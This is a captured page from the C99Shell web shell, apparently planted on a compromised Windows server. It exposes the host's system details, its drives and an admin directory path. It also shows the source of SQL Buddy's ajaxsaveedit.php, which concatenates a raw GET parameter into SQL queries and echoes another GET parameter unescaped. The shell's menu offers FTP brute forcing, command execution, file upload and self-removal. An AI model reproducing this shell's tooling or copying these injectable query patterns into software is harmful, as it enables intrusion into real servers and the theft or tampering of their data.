!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\boletinlegal\admin\report\sqlbuddy\   drwxrwxrwx
Free 1.15 GB of 239.26 GB (0.48%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ajaxsaveedit.php (3.02 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*

SQL Buddy - Web based MySQL administration
http://www.sqlbuddy.com/

ajaxsaveedit.php
- saves data to the database

MIT license

2008 Calvin Lough <http://calv.in>

*/

include "functions.php";

loginCheck();

if (isset(
$db))
    
$conn->selectDB($db);

if (
$_POST && isset($table)) {
    
    
$insertChoice "";
    
    if (isset(
$_POST['SB_INSERT_CHOICE'])) {
        
$insertChoice $_POST['SB_INSERT_CHOICE'];
    }
    
    
$structureSql $conn->describeTable($table);
    
    if (
$conn->getAdapter() == "mysql") {
        while (
$structureRow $conn->fetchAssoc($structureSql)) {
            
$pairs[$structureRow['Field']] = '';
            
$types[$structureRow['Field']] = $structureRow['Type'];
            
$nulls[$structureRow['Field']] = (isset($structureRow['Null'])) ? $structureRow['Null'] : "YES";
        }
    } else if (
$conn->getAdapter() == "sqlite") {
        foreach (
$structureRow as $column) {
            
$pairs[$column[0]] = '';
        }
    }
    
    foreach (
$_POST as $key=>$value) {
        if (
$key != "SB_INSERT_CHOICE") {    
            if (
is_array($value)) {
                
$value implode(","$value);
            }
            
            
$pairs[$key] = $conn->escapeString($value);
        }
    }
    
    if (isset(
$pairs)) {
        
        if (
$insertChoice != "INSERT") {
            
$updates "";
            
            foreach (
$pairs as $keyname=>$value) {
                if (
$conn->getAdapter() == "mysql") {
                    if (isset(
$types) && substr($value02) == "0x" && isset($binaryDTs) && in_array($types[$keyname], $binaryDTs)) {
                        
$updates .= "`" $keyname "`=" $value ",";
                    } else if (!
$value && !($value != '' && (int)$value == 0) && $nulls[$keyname] == "YES") {
                        
$updates .= "`" $keyname "`=NULL,";
                    } else {
                        
$updates .= "`" $keyname "`='" $value "',";
                    }
                }
            }
            
            
$updates substr($updates0, -1);
            
            if (isset(
$_GET['queryPart']))
                
$queryPart $_GET['queryPart'];
            else
                
$queryPart "";
            
            if (
$conn->getAdapter() == "mysql") {
                
$query "UPDATE `$table` SET " $updates " " $queryPart;
            } else if (
$conn->getAdapter() == "sqlite") {
                
$query "UPDATE '$table' SET " $updates " " $queryPart;
            }
            
        } else {
            
$columns "";
            
$values "";
            
            foreach (
$pairs as $keyname=>$value) {
                
                if (
$conn->getAdapter() == "mysql") {
                    
$columns .= "`" $keyname "`,";
                } else if (
$conn->getAdapter() == "sqlite") {
                    
$columns .= "'" $keyname "',";
                }
                
                if (isset(
$types) && substr($value02) == "0x" && isset($binaryDTs) && in_array($types[$keyname], $binaryDTs)) {
                    
$values .= $value ",";
                } else {
                    
$values .= "'" $value "',";
                }
                
            }
            
            
$columns substr($columns0, -1);
            
$values substr($values0, -1);
            
            if (
$conn->getAdapter() == "mysql") {
                
$query "INSERT INTO `$table` ($columns) VALUES ($values)";
            } else if (
$conn->getAdapter() == "sqlite") {
                
$query "INSERT INTO '$table' ($columns) VALUES ($values)";
            }
        }
        
        
$conn->query($query) or ($dbError $conn->error());
        
        echo 
"{\n";
        echo 
"    \"formupdate\": \"" $_GET['form'] . "\",\n";
        echo 
"    \"errormess\": \"";
        if (isset(
$dbError))
            echo 
$dbError;
        echo 
"\"\n";
        echo 
'}';
        
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--